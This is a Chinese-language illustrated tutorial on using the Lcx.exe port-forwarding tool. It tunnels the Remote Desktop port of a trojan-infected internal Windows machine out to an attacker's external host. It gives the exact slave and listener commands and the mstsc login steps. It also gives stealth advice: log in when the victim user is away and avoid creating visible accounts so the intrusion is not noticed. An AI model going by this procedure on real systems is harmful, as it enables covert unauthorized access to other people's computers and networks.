windows中使用Lcx進行內網連接埠轉寄【圖解】教程

在理論上只要網路連接的電腦都是可以訪問的，但是在實際中往往由於技術水平等原因，很難實現它;例如區域網路中的某台電腦僅僅開放了Web服務，該服務僅能供內網使用者使用，而外網使用者根本沒有辦法直接存取。因此要想讓外網使用者能夠訪問區域網路中的系統服務，這必須進行連接埠映射等操作才行。連接埠映射在外網串連內網的時候經常用到，特別是要登陸遠程終端服務時，使用連接埠映射就非常方便。

Lcx.exe是一個連接埠轉寄工具，相當於把機器A上的3389連接埠轉寄到具有外網IP地址的B機上，這樣串連B機的3389連接埠就相當於串連A機的 3389連接埠。Lcx程式多用於被控制電腦(機器A)處於內網的情況，被控制機可能中了木馬程式，雖然能夠進行控制，但還是沒有使用遠程終端登陸到本機進行管理方便，因此在很多情況下，都會想方設法在被控制電腦上開啟3389連接埠，然後通過lcx等程式進行連接埠轉寄，進而在本地串連到被控制電腦的遠程終端並進行管理和使用。

1確定被控制電腦(機器A)的IP地址

在被控制電腦上開啟遠程終端，然後執行“ipconfig /all”命令，查看其網路設定情況，如圖1所示，該電腦的ip地址為“192.168.80.129”

 

圖1 確定被控制電腦的IP地址

2在被控制電腦(機器A)上執行連接埠轉寄命令

在被控制電腦上執行“lcx –slave 218.69.*.* 51 192.168.80.129 3389”，如圖2所示，執行完畢後會給出一些提示，如果顯示為“Make a Connection to 218.69.*.*:51”則表示連接埠轉寄正確。

 

圖2在被控制電腦上執行轉寄命令

說明

lcx一共有三條命令，第一條命令(lcx –lister 51 3389)是在具有外網獨立IP的電腦上執行，表示在本機上監聽51連接埠，該連接埠主要是接受被控制電腦3389連接埠轉寄過來的資料。第二條命令 (lcx –slave 218.69.*.* 51 192.168.80.129 3389)表示將本機IP地址為192.168.80.129的3389連接埠轉寄到遠程地址為“218.69.*.*”的51連接埠。第三條命令是連接埠轉向。

3在本機(機器B)上執行監聽命令

在本機上開啟DOS命令提示字元，然後到lcx.exe程式所在路徑執行“lcx –lister 51 3389”命令，監聽51連接埠，監聽成功後，會顯示如圖3所示的資料。

 

圖3 在本機上監聽51連接埠

注意

(1)在本機上監聽的連接埠必須是未使用的連接埠，可以使用“netstat -an |find “51″ ”命令進行查看，如果沒有顯示結果則表示51連接埠可以用來進行監聽。

(2)被控制電腦與本機成功建立串連後會不停的顯示串連資料，如圖4所示，如果未出現資料發送和接受的情況，說明串連建立不成功。

 

圖4 成功建立串連

4在本機使用遠程終端進行登入

在DOS提示符下輸入“mstsc”命令開啟遠程終端連接器，輸入“127.0.0.1”後單擊“串連”按鈕進行遠程終端串連，在出現登入介面後分別收入使用者名稱和密碼，驗證通過後，即可遠程進入被控制電腦的案頭，如圖5所示，輸入“ipconfig /all”以及“net user”命令來查看網路設定情況以及使用者資訊。

 

圖5遠程登入被控制電腦

注意

(1)如果被控制電腦是伺服器，則在登陸時可以直接進行登陸;如果被控制電腦是Windows XP系統，則最好選擇使用者不在電腦的時間進行登陸，否則容易被發現。

(2)不要輕易在被控制電腦上建立帳號，尤其是Windows XP，建立帳號後，會立即在登陸介面中進行顯示。

5查看本地串連

在被控制電腦上使用“netstat -an”查看當前所有的串連時，可以看到被控制電腦時在跟自己進行遠程終端串連，如圖6所示，而實際的3389連接埠是跟原生51連接埠進行串連的。

 

圖6 查看實際網路連接

本案例通過使用lcx連接埠轉寄程式，成功的在本機連入被控制電腦的內網，可以很方便的對該電腦進行遠端管理，在進行內網滲透時尤為有用。